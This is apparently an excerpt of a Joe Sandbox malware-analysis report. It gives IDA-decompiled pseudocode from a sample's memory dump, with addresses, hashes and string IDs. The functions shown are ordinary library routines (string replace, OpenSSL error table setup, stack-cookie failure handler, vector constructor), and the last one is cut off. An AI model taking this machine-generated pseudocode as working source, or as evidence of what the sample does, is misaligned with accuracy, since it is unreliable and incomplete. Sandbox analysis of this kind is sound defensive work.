                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 75%
                                                                                                    			E00417D50(signed int __ebx, intOrPtr* __ecx, signed int _a4, signed int _a8, intOrPtr* _a12, signed int _a16) {
                                                                                                    				intOrPtr* _v8;
                                                                                                    				signed int _v12;
                                                                                                    				intOrPtr _v20;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				signed int _t64;
                                                                                                    				signed int _t67;
                                                                                                    				signed int _t69;
                                                                                                    				signed int _t71;
                                                                                                    				signed int _t73;
                                                                                                    				signed int _t76;
                                                                                                    				intOrPtr _t82;
                                                                                                    				intOrPtr _t88;
                                                                                                    				intOrPtr* _t96;
                                                                                                    				intOrPtr* _t99;
                                                                                                    				signed int _t101;
                                                                                                    				intOrPtr _t102;
                                                                                                    				signed int _t105;
                                                                                                    				signed int _t109;
                                                                                                    				signed int _t113;
                                                                                                    				intOrPtr _t118;
                                                                                                    				intOrPtr* _t120;
                                                                                                    				void* _t122;
                                                                                                    				signed int _t123;
                                                                                                    				intOrPtr* _t124;
                                                                                                    				intOrPtr* _t125;
                                                                                                    				intOrPtr* _t128;
                                                                                                    				intOrPtr* _t130;
                                                                                                    				intOrPtr _t131;
                                                                                                    				void* _t132;
                                                                                                    				intOrPtr* _t142;
                                                                                                    				signed int _t144;
                                                                                                    				void* _t151;
                                                                                                    
                                                                                                    				_t101 = __ebx;
                                                                                                    				_t130 = _a12;
                                                                                                    				_t142 = __ecx;
                                                                                                    				if(_t130 == 0) {
                                                                                                    					L13:
                                                                                                    					_t64 =  *(_t142 + 0x10);
                                                                                                    					_t109 = _a4;
                                                                                                    					__eflags = _t64 - _t109;
                                                                                                    					if(__eflags < 0) {
                                                                                                    						_push("invalid string position");
                                                                                                    						E0044F26C(__eflags);
                                                                                                    						goto L44;
                                                                                                    					} else {
                                                                                                    						_t122 = _t64 - _t109;
                                                                                                    						_t109 = _a16;
                                                                                                    						_push(_t101);
                                                                                                    						_t105 = _a8;
                                                                                                    						__eflags = _t122 - _t105;
                                                                                                    						_t101 =  <  ? _t122 : _t105;
                                                                                                    						_t73 = _t64 - _t101;
                                                                                                    						_a8 = _t73;
                                                                                                    						__eflags = (_t73 | 0xffffffff) - _t109 - _a8;
                                                                                                    						if(__eflags <= 0) {
                                                                                                    							L44:
                                                                                                    							_push("string too long");
                                                                                                    							E0044F23E(__eflags);
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							_push(_t101);
                                                                                                    							_push(_t142);
                                                                                                    							_push(_t130);
                                                                                                    							_t131 = _v20;
                                                                                                    							__eflags =  *((intOrPtr*)(_t109 + 0x10)) - _t131;
                                                                                                    							_t132 =  <  ?  *((void*)(_t109 + 0x10)) : _t131;
                                                                                                    							__eflags =  *((intOrPtr*)(_t109 + 0x14)) - 8;
                                                                                                    							if( *((intOrPtr*)(_t109 + 0x14)) >= 8) {
                                                                                                    								_t109 =  *_t109;
                                                                                                    							}
                                                                                                    							_t102 = _a12;
                                                                                                    							__eflags = _t132 - _t102;
                                                                                                    							_t144 =  <  ? _t132 : _t102;
                                                                                                    							__eflags = _t144;
                                                                                                    							if(_t144 == 0) {
                                                                                                    								L51:
                                                                                                    								_t67 = 0;
                                                                                                    								__eflags = 0;
                                                                                                    							} else {
                                                                                                    								_t120 = _a8;
                                                                                                    								while(1) {
                                                                                                    									__eflags =  *_t109 -  *_t120;
                                                                                                    									if( *_t109 !=  *_t120) {
                                                                                                    										break;
                                                                                                    									}
                                                                                                    									_t109 = _t109 + 2;
                                                                                                    									_t120 = _t120 + 2;
                                                                                                    									_t144 = _t144 - 1;
                                                                                                    									__eflags = _t144;
                                                                                                    									if(_t144 != 0) {
                                                                                                    										continue;
                                                                                                    									} else {
                                                                                                    										goto L51;
                                                                                                    									}
                                                                                                    									goto L52;
                                                                                                    								}
                                                                                                    								_t71 =  *_t109 & 0x0000ffff;
                                                                                                    								__eflags = _t71 -  *_t120;
                                                                                                    								asm("sbb eax, eax");
                                                                                                    								_t67 = (_t71 & 0xfffffffe) + 1;
                                                                                                    							}
                                                                                                    							L52:
                                                                                                    							__eflags = _t67;
                                                                                                    							if(_t67 != 0) {
                                                                                                    								L57:
                                                                                                    								return _t67;
                                                                                                    							} else {
                                                                                                    								__eflags = _t132 - _t102;
                                                                                                    								if(_t132 >= _t102) {
                                                                                                    									__eflags = _t132 - _t102;
                                                                                                    									_t63 = _t132 != _t102;
                                                                                                    									__eflags = _t63;
                                                                                                    									_t67 = 0 | _t63;
                                                                                                    									goto L57;
                                                                                                    								} else {
                                                                                                    									_t69 = _t67 | 0xffffffff;
                                                                                                    									__eflags = _t69;
                                                                                                    									return _t69;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						} else {
                                                                                                    							_t123 = _t122 - _t101;
                                                                                                    							_v12 = _t123;
                                                                                                    							__eflags = _t109 - _t101;
                                                                                                    							if(_t109 < _t101) {
                                                                                                    								_t88 =  *((intOrPtr*)(_t142 + 0x14));
                                                                                                    								__eflags = _t88 - 8;
                                                                                                    								if(_t88 < 8) {
                                                                                                    									_a8 = _t142;
                                                                                                    								} else {
                                                                                                    									_a8 =  *_t142;
                                                                                                    									_t130 = _a12;
                                                                                                    								}
                                                                                                    								__eflags = _t88 - 8;
                                                                                                    								if(_t88 < 8) {
                                                                                                    									_v8 = _t142;
                                                                                                    								} else {
                                                                                                    									_v8 =  *_t142;
                                                                                                    								}
                                                                                                    								__eflags = _t123;
                                                                                                    								if(_t123 != 0) {
                                                                                                    									E004205A0(_v8 + (_a4 + _t109) * 2, _a8 + (_a4 + _t101) * 2, _t123 + _t123);
                                                                                                    									_t130 = _a12;
                                                                                                    									_t151 = _t151 + 0xc;
                                                                                                    									_t109 = _a16;
                                                                                                    								}
                                                                                                    							}
                                                                                                    							__eflags = _t109;
                                                                                                    							if(_t109 != 0) {
                                                                                                    								L26:
                                                                                                    								_a8 = _t109 - _t101 +  *(_t142 + 0x10);
                                                                                                    								_t76 = E00415D50(_t101, _t142, _t130, _t142, _t109 - _t101 +  *(_t142 + 0x10), 0);
                                                                                                    								__eflags = _t76;
                                                                                                    								if(_t76 != 0) {
                                                                                                    									_t113 = _a16;
                                                                                                    									__eflags = _t101 - _t113;
                                                                                                    									if(_t101 >= _t113) {
                                                                                                    										_t107 = _a4;
                                                                                                    									} else {
                                                                                                    										_t82 =  *((intOrPtr*)(_t142 + 0x14));
                                                                                                    										__eflags = _t82 - 8;
                                                                                                    										if(_t82 < 8) {
                                                                                                    											_t125 = _t142;
                                                                                                    										} else {
                                                                                                    											_t125 =  *_t142;
                                                                                                    										}
                                                                                                    										__eflags = _t82 - 8;
                                                                                                    										if(_t82 < 8) {
                                                                                                    											_a12 = _t142;
                                                                                                    										} else {
                                                                                                    											_a12 =  *_t142;
                                                                                                    										}
                                                                                                    										_t107 = _a4;
                                                                                                    										E0040B600(_a12 + (_a4 + _t113) * 2, _t125 + (_a4 + _t101) * 2, _v12);
                                                                                                    										_t113 = _a16;
                                                                                                    										_t151 = _t151 + 4;
                                                                                                    									}
                                                                                                    									__eflags =  *((intOrPtr*)(_t142 + 0x14)) - 8;
                                                                                                    									if( *((intOrPtr*)(_t142 + 0x14)) < 8) {
                                                                                                    										_t124 = _t142;
                                                                                                    									} else {
                                                                                                    										_t124 =  *_t142;
                                                                                                    									}
                                                                                                    									__eflags = _t113;
                                                                                                    									if(_t113 != 0) {
                                                                                                    										E0042D8D0(_t124 + _t107 * 2, _t130, _t113 + _t113);
                                                                                                    									}
                                                                                                    									E00414DF0(_t142, _a8);
                                                                                                    								}
                                                                                                    							} else {
                                                                                                    								__eflags = _t101;
                                                                                                    								if(_t101 != 0) {
                                                                                                    									goto L26;
                                                                                                    								}
                                                                                                    							}
                                                                                                    							return _t142;
                                                                                                    						}
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					_t118 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                    					if(_t118 < 8) {
                                                                                                    						_t96 = __ecx;
                                                                                                    					} else {
                                                                                                    						_t96 =  *__ecx;
                                                                                                    					}
                                                                                                    					if(_t130 < _t96) {
                                                                                                    						goto L13;
                                                                                                    					} else {
                                                                                                    						if(_t118 < 8) {
                                                                                                    							_t128 = _t142;
                                                                                                    						} else {
                                                                                                    							_t128 =  *_t142;
                                                                                                    						}
                                                                                                    						if(_t128 +  *(_t142 + 0x10) * 2 <= _t130) {
                                                                                                    							goto L13;
                                                                                                    						} else {
                                                                                                    							if(_t118 < 8) {
                                                                                                    								_t99 = _t142;
                                                                                                    							} else {
                                                                                                    								_t99 =  *_t142;
                                                                                                    							}
                                                                                                    							return E00414920(_t101, _t142, _t130 - _t99 >> 1, _t142, _a4, _a8, _t142, _t130 - _t99 >> 1, _a16);
                                                                                                    						}
                                                                                                    					}
                                                                                                    				}
                                                                                                    			}





































                                                                                                    0x00417d50
                                                                                                    0x00417d58
                                                                                                    0x00417d5b
                                                                                                    0x00417d5f
                                                                                                    0x00417db1
                                                                                                    0x00417db1
                                                                                                    0x00417db4
                                                                                                    0x00417db7
                                                                                                    0x00417db9
                                                                                                    0x00417edf
                                                                                                    0x00417ee4
                                                                                                    0x00000000
                                                                                                    0x00417dbf
                                                                                                    0x00417dc1
                                                                                                    0x00417dc3
                                                                                                    0x00417dc6
                                                                                                    0x00417dc7
                                                                                                    0x00417dca
                                                                                                    0x00417dcc
                                                                                                    0x00417dcf
                                                                                                    0x00417dd1
                                                                                                    0x00417dd9
                                                                                                    0x00417ddc
                                                                                                    0x00417ee9
                                                                                                    0x00417ee9
                                                                                                    0x00417eee
                                                                                                    0x00417ef3
                                                                                                    0x00417ef4
                                                                                                    0x00417ef5
                                                                                                    0x00417ef6
                                                                                                    0x00417ef7
                                                                                                    0x00417ef8
                                                                                                    0x00417ef9
                                                                                                    0x00417efa
                                                                                                    0x00417efb
                                                                                                    0x00417efc
                                                                                                    0x00417efd
                                                                                                    0x00417efe
                                                                                                    0x00417eff
                                                                                                    0x00417f03
                                                                                                    0x00417f04
                                                                                                    0x00417f05
                                                                                                    0x00417f06
                                                                                                    0x00417f09
                                                                                                    0x00417f0c
                                                                                                    0x00417f10
                                                                                                    0x00417f14
                                                                                                    0x00417f16
                                                                                                    0x00417f16
                                                                                                    0x00417f18
                                                                                                    0x00417f1b
                                                                                                    0x00417f1f
                                                                                                    0x00417f22
                                                                                                    0x00417f24
                                                                                                    0x00417f41
                                                                                                    0x00417f41
                                                                                                    0x00417f41
                                                                                                    0x00417f26
                                                                                                    0x00417f26
                                                                                                    0x00417f30
                                                                                                    0x00417f33
                                                                                                    0x00417f36
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00417f38
                                                                                                    0x00417f3b
                                                                                                    0x00417f3e
                                                                                                    0x00417f3e
                                                                                                    0x00417f3f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00417f3f
                                                                                                    0x00417f55
                                                                                                    0x00417f58
                                                                                                    0x00417f5b
                                                                                                    0x00417f60
                                                                                                    0x00417f60
                                                                                                    0x00417f43
                                                                                                    0x00417f43
                                                                                                    0x00417f45
                                                                                                    0x00417f6a
                                                                                                    0x00417f6e
                                                                                                    0x00417f47
                                                                                                    0x00417f47
                                                                                                    0x00417f49
                                                                                                    0x00417f65
                                                                                                    0x00417f67
                                                                                                    0x00417f67
                                                                                                    0x00417f67
                                                                                                    0x00000000
                                                                                                    0x00417f4b
                                                                                                    0x00417f4d
                                                                                                    0x00417f4d
                                                                                                    0x00417f52
                                                                                                    0x00417f52
                                                                                                    0x00417f49
                                                                                                    0x00417de2
                                                                                                    0x00417de2
                                                                                                    0x00417de4
                                                                                                    0x00417de7
                                                                                                    0x00417de9
                                                                                                    0x00417deb
                                                                                                    0x00417dee
                                                                                                    0x00417df1
                                                                                                    0x00417dfd
                                                                                                    0x00417df3
                                                                                                    0x00417df5
                                                                                                    0x00417df8
                                                                                                    0x00417df8
                                                                                                    0x00417e00
                                                                                                    0x00417e03
                                                                                                    0x00417e0c
                                                                                                    0x00417e05
                                                                                                    0x00417e07
                                                                                                    0x00417e07
                                                                                                    0x00417e0f
                                                                                                    0x00417e11
                                                                                                    0x00417e2e
                                                                                                    0x00417e33
                                                                                                    0x00417e36
                                                                                                    0x00417e39
                                                                                                    0x00417e39
                                                                                                    0x00417e11
                                                                                                    0x00417e3c
                                                                                                    0x00417e3e
                                                                                                    0x00417e48
                                                                                                    0x00417e4f
                                                                                                    0x00417e55
                                                                                                    0x00417e5a
                                                                                                    0x00417e5c
                                                                                                    0x00417e5e
                                                                                                    0x00417e61
                                                                                                    0x00417e63
                                                                                                    0x00417ea6
                                                                                                    0x00417e65
                                                                                                    0x00417e65
                                                                                                    0x00417e68
                                                                                                    0x00417e6b
                                                                                                    0x00417e71
                                                                                                    0x00417e6d
                                                                                                    0x00417e6d
                                                                                                    0x00417e6d
                                                                                                    0x00417e73
                                                                                                    0x00417e76
                                                                                                    0x00417e7f
                                                                                                    0x00417e78
                                                                                                    0x00417e7a
                                                                                                    0x00417e7a
                                                                                                    0x00417e8a
                                                                                                    0x00417e99
                                                                                                    0x00417e9e
                                                                                                    0x00417ea1
                                                                                                    0x00417ea1
                                                                                                    0x00417ea9
                                                                                                    0x00417ead
                                                                                                    0x00417eb3
                                                                                                    0x00417eaf
                                                                                                    0x00417eaf
                                                                                                    0x00417eaf
                                                                                                    0x00417eb5
                                                                                                    0x00417eb7
                                                                                                    0x00417ec2
                                                                                                    0x00417ec7
                                                                                                    0x00417ecf
                                                                                                    0x00417ecf
                                                                                                    0x00417e40
                                                                                                    0x00417e40
                                                                                                    0x00417e42
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00417e42
                                                                                                    0x00417edc
                                                                                                    0x00417edc
                                                                                                    0x00417ddc
                                                                                                    0x00417d61
                                                                                                    0x00417d61
                                                                                                    0x00417d67
                                                                                                    0x00417d6d
                                                                                                    0x00417d69
                                                                                                    0x00417d69
                                                                                                    0x00417d69
                                                                                                    0x00417d71
                                                                                                    0x00000000
                                                                                                    0x00417d73
                                                                                                    0x00417d76
                                                                                                    0x00417d7c
                                                                                                    0x00417d78
                                                                                                    0x00417d78
                                                                                                    0x00417d78
                                                                                                    0x00417d86
                                                                                                    0x00000000
                                                                                                    0x00417d88
                                                                                                    0x00417d8b
                                                                                                    0x00417d91
                                                                                                    0x00417d8d
                                                                                                    0x00417d8d
                                                                                                    0x00417d8d
                                                                                                    0x00417dae
                                                                                                    0x00417dae
                                                                                                    0x00417d86
                                                                                                    0x00417d71

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memmove
                                                                                                    • String ID: invalid string position$string too long
                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                    • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                    • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                                    • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                    • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 86%
                                                                                                    			E004516A0(void* __ebx, void* __edi) {
                                                                                                    				char* _t6;
                                                                                                    				intOrPtr _t12;
                                                                                                    				void* _t14;
                                                                                                    				char* _t16;
                                                                                                    				char** _t19;
                                                                                                    				void* _t21;
                                                                                                    				void* _t22;
                                                                                                    				void* _t23;
                                                                                                    
                                                                                                    				E004547A0(_t14, __edi, 5, 1, ".\\crypto\\err\\err.c", 0x244);
                                                                                                    				_t22 = _t21 + 0x10;
                                                                                                    				if( *0x50b6d4 != 0) {
                                                                                                    					E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x24b);
                                                                                                    					E004547A0(_t14, __edi, 9, 1, ".\\crypto\\err\\err.c", 0x24c);
                                                                                                    					_t23 = _t22 + 0x20;
                                                                                                    					__eflags =  *0x50b6d4;
                                                                                                    					if( *0x50b6d4 != 0) {
                                                                                                    						_push(__ebx);
                                                                                                    						_push(__edi);
                                                                                                    						_t12 = 1;
                                                                                                    						_t16 = 0x5117e0;
                                                                                                    						_t19 = 0x5113e4;
                                                                                                    						do {
                                                                                                    							__eflags =  *_t19;
                                                                                                    							 *((intOrPtr*)(_t19 - 4)) = _t12;
                                                                                                    							if(__eflags == 0) {
                                                                                                    								_push(_t12);
                                                                                                    								_t6 = E004C5D39(_t12, _t14, __eflags);
                                                                                                    								_t23 = _t23 + 4;
                                                                                                    								__eflags = _t6;
                                                                                                    								if(_t6 != 0) {
                                                                                                    									E004C5E00(_t16, _t6, 0x20);
                                                                                                    									_t23 = _t23 + 0xc;
                                                                                                    									_t16[0x1f] = 0;
                                                                                                    									 *_t19 = _t16;
                                                                                                    								}
                                                                                                    								__eflags =  *_t19;
                                                                                                    								if( *_t19 == 0) {
                                                                                                    									 *_t19 = "unknown";
                                                                                                    								}
                                                                                                    							}
                                                                                                    							_t19 =  &(_t19[2]);
                                                                                                    							_t12 = _t12 + 1;
                                                                                                    							_t16 =  &(_t16[0x20]);
                                                                                                    							__eflags = _t19 - 0x5117d4;
                                                                                                    						} while (_t19 <= 0x5117d4);
                                                                                                    						 *0x50b6d4 = 0;
                                                                                                    						return E004547A0(_t14, _t16, 0xa, 1, ".\\crypto\\err\\err.c", 0x26c);
                                                                                                    					} else {
                                                                                                    						return E004547A0(_t14, __edi, 0xa, 1, ".\\crypto\\err\\err.c", 0x24f);
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					return E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x247);
                                                                                                    				}
                                                                                                    			}











                                                                                                    0x004516ae
                                                                                                    0x004516b3
                                                                                                    0x004516bd
                                                                                                    0x004516e4
                                                                                                    0x004516f7
                                                                                                    0x004516fc
                                                                                                    0x004516ff
                                                                                                    0x00451706
                                                                                                    0x0045171f
                                                                                                    0x00451721
                                                                                                    0x00451722
                                                                                                    0x00451727
                                                                                                    0x0045172c
                                                                                                    0x00451731
                                                                                                    0x00451731
                                                                                                    0x00451734
                                                                                                    0x00451737
                                                                                                    0x00451739
                                                                                                    0x0045173a
                                                                                                    0x0045173f
                                                                                                    0x00451742
                                                                                                    0x00451744
                                                                                                    0x0045174a
                                                                                                    0x0045174f
                                                                                                    0x00451752
                                                                                                    0x00451756
                                                                                                    0x00451756
                                                                                                    0x00451758
                                                                                                    0x0045175b
                                                                                                    0x0045175d
                                                                                                    0x0045175d
                                                                                                    0x0045175b
                                                                                                    0x00451763
                                                                                                    0x00451766
                                                                                                    0x00451767
                                                                                                    0x0045176a
                                                                                                    0x0045176a
                                                                                                    0x00451780
                                                                                                    0x00451795
                                                                                                    0x00451708
                                                                                                    0x0045171e
                                                                                                    0x0045171e
                                                                                                    0x004516bf
                                                                                                    0x004516d5
                                                                                                    0x004516d5

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .\crypto\err\err.c$unknown
                                                                                                    • API String ID: 0-565200744
                                                                                                    • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                    • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                                    • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                    • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 88%
                                                                                                    			E0042A77E(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                    				intOrPtr _v0;
                                                                                                    				void* _v808;
                                                                                                    				int _t9;
                                                                                                    				intOrPtr _t14;
                                                                                                    				signed int _t15;
                                                                                                    				signed int _t17;
                                                                                                    				signed int _t19;
                                                                                                    				intOrPtr _t22;
                                                                                                    				intOrPtr _t23;
                                                                                                    				intOrPtr _t24;
                                                                                                    				intOrPtr _t25;
                                                                                                    				intOrPtr _t26;
                                                                                                    				intOrPtr _t27;
                                                                                                    				intOrPtr _t28;
                                                                                                    				intOrPtr* _t30;
                                                                                                    				intOrPtr* _t32;
                                                                                                    				void* _t35;
                                                                                                    
                                                                                                    				_t28 = __esi;
                                                                                                    				_t27 = __edi;
                                                                                                    				_t26 = __edx;
                                                                                                    				_t23 = __ecx;
                                                                                                    				_t22 = __ebx;
                                                                                                    				_t35 = _t23 -  *0x50ad20; // 0x2cb5b44c
                                                                                                    				if(_t35 == 0) {
                                                                                                    					asm("repe ret");
                                                                                                    				}
                                                                                                    				_t30 = _t32;
                                                                                                    				_t9 = IsProcessorFeaturePresent(0x17);
                                                                                                    				if(_t9 != 0) {
                                                                                                    					_t23 = 2;
                                                                                                    					asm("int 0x29");
                                                                                                    				}
                                                                                                    				 *0x510e38 = _t9;
                                                                                                    				 *0x510e34 = _t23;
                                                                                                    				 *0x510e30 = _t26;
                                                                                                    				 *0x510e2c = _t22;
                                                                                                    				 *0x510e28 = _t28;
                                                                                                    				 *0x510e24 = _t27;
                                                                                                    				 *0x510e50 = ss;
                                                                                                    				 *0x510e44 = cs;
                                                                                                    				 *0x510e20 = ds;
                                                                                                    				 *0x510e1c = es;
                                                                                                    				 *0x510e18 = fs;
                                                                                                    				 *0x510e14 = gs;
                                                                                                    				asm("pushfd");
                                                                                                    				_pop( *0x510e48);
                                                                                                    				 *0x510e3c =  *_t30;
                                                                                                    				 *0x510e40 = _v0;
                                                                                                    				 *0x510e4c =  &_a4;
                                                                                                    				 *0x510d88 = 0x10001;
                                                                                                    				_t14 =  *0x510e40; // 0x0
                                                                                                    				 *0x510d44 = _t14;
                                                                                                    				 *0x510d38 = 0xc0000409;
                                                                                                    				 *0x510d3c = 1;
                                                                                                    				 *0x510d48 = 1;
                                                                                                    				_t15 = 4;
                                                                                                    				 *((intOrPtr*)(0x510d4c + _t15 * 0)) = 2;
                                                                                                    				_t17 = 4;
                                                                                                    				_t24 =  *0x50ad20; // 0x2cb5b44c
                                                                                                    				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
                                                                                                    				_t19 = 4;
                                                                                                    				_t25 =  *0x50ad24; // 0xd34a4bb3
                                                                                                    				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
                                                                                                    				return E0042AB4B(_t19 << 0, "8\rQ");
                                                                                                    			}




















                                                                                                    0x0042a77e
                                                                                                    0x0042a77e
                                                                                                    0x0042a77e
                                                                                                    0x0042a77e
                                                                                                    0x0042a77e
                                                                                                    0x0042a77e
                                                                                                    0x0042a784
                                                                                                    0x0042a786
                                                                                                    0x0042a786
                                                                                                    0x0042ab89
                                                                                                    0x0042ab93
                                                                                                    0x0042ab9a
                                                                                                    0x0042ab9e
                                                                                                    0x0042ab9f
                                                                                                    0x0042ab9f
                                                                                                    0x0042aba1
                                                                                                    0x0042aba6
                                                                                                    0x0042abac
                                                                                                    0x0042abb2
                                                                                                    0x0042abb8
                                                                                                    0x0042abbe
                                                                                                    0x0042abc4
                                                                                                    0x0042abcb
                                                                                                    0x0042abd2
                                                                                                    0x0042abd9
                                                                                                    0x0042abe0
                                                                                                    0x0042abe7
                                                                                                    0x0042abee
                                                                                                    0x0042abef
                                                                                                    0x0042abf8
                                                                                                    0x0042ac00
                                                                                                    0x0042ac08
                                                                                                    0x0042ac13
                                                                                                    0x0042ac1d
                                                                                                    0x0042ac22
                                                                                                    0x0042ac27
                                                                                                    0x0042ac31
                                                                                                    0x0042ac3b
                                                                                                    0x0042ac47
                                                                                                    0x0042ac4b
                                                                                                    0x0042ac57
                                                                                                    0x0042ac5b
                                                                                                    0x0042ac61
                                                                                                    0x0042ac67
                                                                                                    0x0042ac6b
                                                                                                    0x0042ac71
                                                                                                    0x0042ac82

                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                                    • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                    • String ID: 8Q
                                                                                                    • API String ID: 3761405300-2096853525
                                                                                                    • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                    • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                                    • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                    • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 52%
                                                                                                    			E00413C40(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4) {
                                                                                                    				intOrPtr _t14;
                                                                                                    				intOrPtr _t15;
                                                                                                    				intOrPtr* _t18;
                                                                                                    				void* _t20;
                                                                                                    				intOrPtr _t22;
                                                                                                    				intOrPtr* _t25;
                                                                                                    				intOrPtr* _t27;
                                                                                                    				void* _t32;
                                                                                                    
                                                                                                    				_t18 = __ecx;
                                                                                                    				_t25 = __ecx;
                                                                                                    				_push(__edi);
                                                                                                    				_t22 = _a4;
                                                                                                    				 *__ecx = 0;
                                                                                                    				 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                                                    				 *((intOrPtr*)(__ecx + 8)) = 0;
                                                                                                    				if(_t22 == 0) {
                                                                                                    					L4:
                                                                                                    					return _t25;
                                                                                                    				} else {
                                                                                                    					_t36 = _t22 - 0xffffffff;
                                                                                                    					if(_t22 > 0xffffffff) {
                                                                                                    						_push("vector<T> too long");
                                                                                                    						E0044F23E(__eflags);
                                                                                                    						goto L6;
                                                                                                    					} else {
                                                                                                    						_t15 = E00423B4C(__ebx, _t20, _t22, _t36, _t22);
                                                                                                    						_t32 = _t32 + 4;
                                                                                                    						if(_t15 == 0) {
                                                                                                    							L6:
                                                                                                    							E0044F1BB(__eflags);
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							asm("int3");
                                                                                                    							_push(_t25);
                                                                                                    							_t27 = _t18;
                                                                                                    							_t14 =  *_t27;
                                                                                                    							__eflags = _t14;
                                                                                                    							if(_t14 != 0) {
                                                                                                    								_t14 = L00422587(_t14);
                                                                                                    								 *_t27 = 0;
                                                                                                    								 *((intOrPtr*)(_t27 + 4)) = 0;
                                                                                                    								 *((intOrPtr*)(_t27 + 8)) = 0;
                                                                                                    							}
                                                                                                    							return _t14;
                                                                                                    						} else {
                                                                                                    							 *_t25 = _t15;
                                                                                                    							 *((intOrPtr*)(_t25 + 4)) = _t15;
                                                                                                    							 *((intOrPtr*)(_t25 + 8)) = _t15 + _t22;
                                                                                                    							E0042B420(_t15, 0, _t22);
                                                                                                    							 *((intOrPtr*)(_t25 + 4)) =  *((intOrPtr*)(_t25 + 4)) + _t22;
                                                                                                    							goto L4;
                                                                                                    						}
